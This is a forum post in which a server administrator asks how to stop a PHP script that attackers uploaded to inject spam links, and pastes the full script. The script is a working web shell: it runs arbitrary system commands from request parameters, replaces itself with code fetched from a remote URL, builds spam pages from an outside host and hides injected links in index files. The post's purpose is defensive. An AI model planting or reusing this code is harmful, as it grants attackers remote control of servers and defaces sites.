stop specific PHP code from executing?

Recently a server I manage has been hit with some sort of PHP hack. A PHP file is being uploaded with a randomly generated file name to a randomly generated directory name. From what I can tell the PHP script is called by the attacker through a browser and it is used to inject spam links/java script exploits into index files. I removed all affected files as well as the source php files that were uploaded.

What I want is to be able to check for this in the future. It would be great if I could some how kill any php script trying to execute this particular code. Is there any way that this can be done? Would mod_security work? The server is a typical LAMP configuration.

Here is the code in question, any suggestions on how I can possibly prevent it from being executed in the future would be appreciated:

Code:

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
	unlink("c");
	unlink("1r");
  unlink("log");
}

function Clear2()
{
	$mrd = trim(file_get_contents("m"));
	$pt = "../$mrd";
	$fin = file_get_contents($pt);
	$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
	$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
	$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
	$fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
	$fmrd = fopen($pt, "w+");
	fwrite($fmrd, $fin);
	fclose($fmrd);
	echo " upt-ok";
}

function GetVar($name, &$var)
{
	$var = "";
	if (isset($_POST[$name]))
		$var = $_POST[$name];

  if (isset($_GET[$name]))
		$var = $_GET[$name];
	
	if (($var) =="")
	  return  false;
	  else return true;
}

function Gen()
{
	$alp = "abcdefghiklmnjsweqrtyuiopzx";
	$maps = array();
	if (isset($_POST["sg"]))
		$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
		$sg = $_GET["sg"]; 
		
	if (isset($_POST["gm"]))
 	 $g = $_POST["gm"];

	if (isset($_GET["gm"]))
		$g = $_GET["gm"];
		
		
	$path = "";
	$fr = fopen("1r", "a+");
	if (file_exists("c"))
	{
		$fconf = file("c");
		$tname = trim($fconf[0]);
		$cname = trim($fconf[1]);
		$curs = trim($fconf[2]);
		$pid = trim($fconf[3]);
		if ($pid == 100)
		{
			$pid = 0;
			$rnd = mt_rand(0, 999);
			$nm = "";
	    for ($i=0; $i<3; $i++)
	  	{
		  	$ran = mt_rand(0,26);
		  	$sym = $alp[$ran];
		  	$nm = $nm.$sym;
		  }
			$cname = $nm;
			mkdir("$tname/$cname");
			$curs = $g;
		}
	}
	else 
	{
		$rnd = mt_rand(0, 999);
		$nm = "";
	  for ($i=0; $i<5; $i++)
		{
			$ran = mt_rand(0,26);
			$sym = $alp[$ran];
			$nm = $nm.$sym;
		}
		$tname = $nm;
		$pid = 0;
		$curs = $g;
		mkdir($tname);
		$fht = fopen("$tname/.htaccess", "w+");
		$htname = $sg."2.txt";
		$fp = fopen($htname, "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		fwrite($fht, $fin);
		fclose($fht);
		$rnd = mt_rand(0, 999);
		$nm = "";
    for ($i=0; $i<3; $i++)
  	{
	  	$ran = mt_rand(0,26);
	  	$sym = $alp[$ran];
	  	$nm = $nm.$sym;
	  }
		$cname = $nm;
	mkdir("$tname/$cname");
	}
  $gname = $sg."sgen.php";
	for ($j=$pid; $j<$pid+10; $j++)
	{
		$fp = fopen($gname."?g=$curs", "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		
		$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
		fwrite($fnd, $fin);
		fclose($fnd);
	}
	
	if ($j==100)
	{
	  $fp = fopen($gname."?g=$curs&m=1", "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
		fwrite($fnd, $fin);
		fclose($fnd);
		$map = "$path/$tname/$cname/$curs"."_lm.htm";
		fwrite($fr,"$map\n");
	}
	
	$fconf = fopen("c", "w+");
	fwrite($fconf, $tname."\n");
	fwrite($fconf, $cname."\n");
	fwrite($fconf, $curs."\n");
	$nj = $j;
	fwrite($fconf, $nj."\n");
	fclose($fconf);
}

function Update()
{
	$thisname = "1.php";
	if (isset($_POST['u']))
	  $u = $_POST['u'];
	  
	if (isset($_GET['u']))
 		$u = $_GET['u'];
 		
 	$fp = fopen($u, "r");
  $fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
	if (isset($_POST['c']))
	  @system($_POST['c']);
  if (isset($_GET['c']))
		@system($_GET['c']);
}

function MRepl()
{
	$mpt = "";
	$drs = "";
	$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
	$mrd = trim(file_get_contents("m"));
	$pt = "../$mrd";
	$fin = file_get_contents($pt);
	GetVar("mpt", $mpt);
	 // óäàëÿåì çàâåðøàþùèå õòìë òåãè
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
	$fp = fopen($mpt, "r");
  $drs = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) 
		 {  
       exit();
		 }
	   $drs .= $fc;
	}
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
	fwrite($fmrd, $fin);
	fclose($fmrd);
}

function Main()
{
	if (isset($_POST['u']) || isset($_GET['u']))
	{
		Update();
		exit();
	}
	
	if (isset($_POST['c']) || isset($_GET['c']))
	{
		Com();
		exit();
	}
	
	if (isset($_POST['g']) || isset($_GET['g']))
	{
		Gen();
		exit();
	}
	
	if (isset($_POST['s']) || isset($_GET['s']))
	{
		MRepl();
		exit();
	}
	
  if (isset($_POST['cl']) || isset($_GET['cl']))
	{
		Clear();
		exit();
	}
	
	if (isset($_POST['cl2']) || isset($_GET['cl2']))
	{
		Clear2();
		exit();
	}
	
	echo "<ok>";
	
}

Main();

?>